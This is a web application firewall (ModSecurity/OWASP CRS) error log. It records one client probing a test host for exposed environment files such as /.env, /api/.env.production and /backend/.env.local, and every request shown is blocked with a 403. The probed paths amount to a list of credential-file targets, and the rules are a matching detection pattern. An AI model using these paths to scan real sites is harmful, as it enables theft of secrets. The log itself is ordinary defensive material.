[Fri Dec 05 08:50:50.128350 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aTKO2uqgQSN2J6Cu49vRNQAAAIA"]
[Fri Dec 05 08:50:50.128618 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aTKO2uqgQSN2J6Cu49vRNQAAAIA"]
[Fri Dec 05 08:50:50.128822 2025] [:error] [pid 531697] [client 195.178.110.155:40396] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aTKO2uqgQSN2J6Cu49vRNQAAAIA"]
[Fri Dec 05 08:50:50.510764 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aTKO2hxEmzMMD18wwRgEiwAAAAI"]
[Fri Dec 05 08:50:50.511003 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aTKO2hxEmzMMD18wwRgEiwAAAAI"]
[Fri Dec 05 08:50:50.511212 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aTKO2hxEmzMMD18wwRgEiwAAAAI"]
[Fri Dec 05 08:50:51.504638 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjAAAAAI"]
[Fri Dec 05 08:50:51.504900 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjAAAAAI"]
[Fri Dec 05 08:50:51.505115 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjAAAAAI"]
[Fri Dec 05 08:50:51.526913 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjQAAAAI"]
[Fri Dec 05 08:50:51.527165 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjQAAAAI"]
[Fri Dec 05 08:50:51.527353 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjQAAAAI"]
[Fri Dec 05 08:50:51.549192 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjgAAAAI"]
[Fri Dec 05 08:50:51.549425 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjgAAAAI"]
[Fri Dec 05 08:50:51.549650 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjgAAAAI"]
[Fri Dec 05 08:50:51.597595 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjwAAAAI"]
[Fri Dec 05 08:50:51.597862 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjwAAAAI"]
[Fri Dec 05 08:50:51.598053 2025] [:error] [pid 532218] [client 195.178.110.155:40406] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env"] [unique_id "aTKO2xxEmzMMD18wwRgEjwAAAAI"]
[Fri Dec 05 08:50:51.951222 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aTKO2yzhE94da41W-WGHtwAAAH4"]
[Fri Dec 05 08:50:51.951464 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aTKO2yzhE94da41W-WGHtwAAAH4"]
[Fri Dec 05 08:50:51.951700 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aTKO2yzhE94da41W-WGHtwAAAH4"]
[Fri Dec 05 08:50:51.973768 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aTKO2yzhE94da41W-WGHuAAAAH4"]
[Fri Dec 05 08:50:51.974003 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aTKO2yzhE94da41W-WGHuAAAAH4"]
[Fri Dec 05 08:50:51.974215 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aTKO2yzhE94da41W-WGHuAAAAH4"]
[Fri Dec 05 08:50:52.009616 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aTKO3CzhE94da41W-WGHuQAAAH4"]
[Fri Dec 05 08:50:52.009861 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aTKO3CzhE94da41W-WGHuQAAAH4"]
[Fri Dec 05 08:50:52.010149 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aTKO3CzhE94da41W-WGHuQAAAH4"]
[Fri Dec 05 08:50:52.031995 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aTKO3CzhE94da41W-WGHugAAAH4"]
[Fri Dec 05 08:50:52.032289 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aTKO3CzhE94da41W-WGHugAAAH4"]
[Fri Dec 05 08:50:52.032500 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aTKO3CzhE94da41W-WGHugAAAH4"]
[Fri Dec 05 08:50:52.153007 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.production"] [unique_id "aTKO3CzhE94da41W-WGHvQAAAH4"]
[Fri Dec 05 08:50:52.153244 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.production"] [unique_id "aTKO3CzhE94da41W-WGHvQAAAH4"]
[Fri Dec 05 08:50:52.153435 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.production"] [unique_id "aTKO3CzhE94da41W-WGHvQAAAH4"]
[Fri Dec 05 08:50:52.175481 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aTKO3CzhE94da41W-WGHvgAAAH4"]
[Fri Dec 05 08:50:52.175719 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aTKO3CzhE94da41W-WGHvgAAAH4"]
[Fri Dec 05 08:50:52.175922 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aTKO3CzhE94da41W-WGHvgAAAH4"]
[Fri Dec 05 08:50:52.198037 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aTKO3CzhE94da41W-WGHvwAAAH4"]
[Fri Dec 05 08:50:52.198271 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aTKO3CzhE94da41W-WGHvwAAAH4"]
[Fri Dec 05 08:50:52.198490 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aTKO3CzhE94da41W-WGHvwAAAH4"]
[Fri Dec 05 08:50:52.221227 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aTKO3CzhE94da41W-WGHwAAAAH4"]
[Fri Dec 05 08:50:52.221465 2025] [:error] [pid 531695] [client 195.178.110.155:40420] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aTKO3CzhE94da41W-WGHwAAAAH4"]
